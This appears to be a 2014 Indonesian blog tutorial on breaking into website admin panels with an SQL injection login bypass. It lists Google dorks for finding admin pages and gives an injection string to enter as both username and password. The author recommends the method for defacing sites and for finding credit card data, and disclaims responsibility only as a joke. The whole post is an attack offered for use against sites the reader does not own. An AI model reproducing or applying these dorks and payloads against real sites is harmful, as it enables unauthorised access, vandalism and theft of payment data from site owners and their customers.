Tutorial Hack Website Dengan Bypass
SQL Login
Oke, kali ini saya mau share tutorial SQLi Bypass
Login :D . Dengan teknik ini, kita bisa login ke
halaman admin suatu website tanpa perlu
memasukkan user dan password yang dibuat oleh
admin. Udah lama sih tutorial ini saya dapat :D . Baru
sempet share aja . hehehe. Oke langsung saja ke
tutorialnya :) .
Google Dork :
inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
Kembangin lagi dorknya ya :)
Langkah langkah :
Nah, kalo udah dapet salahsatu web nya, kita login
dengan user dan password berikut :
user : ' or 1=1 limit 1 -- -+
pass : ' or 1=1 limit 1 -- -+
Jika vuln, pasti masuk halaman admin kok :)
Gampang sekali bukan ?
Cara ini sebenarnya banyak manfaatnya. Selain buat
yang hobi deface sana sini, yang mau cari credit card
pakai cara ini juga terbukti ampuh :D
Tapi inget, dosa tanggung sendiri. ;)
Sekian tutorial kali ini . Terimakasih :)
Tuesday 3 June 2014
Posts
Post a Comment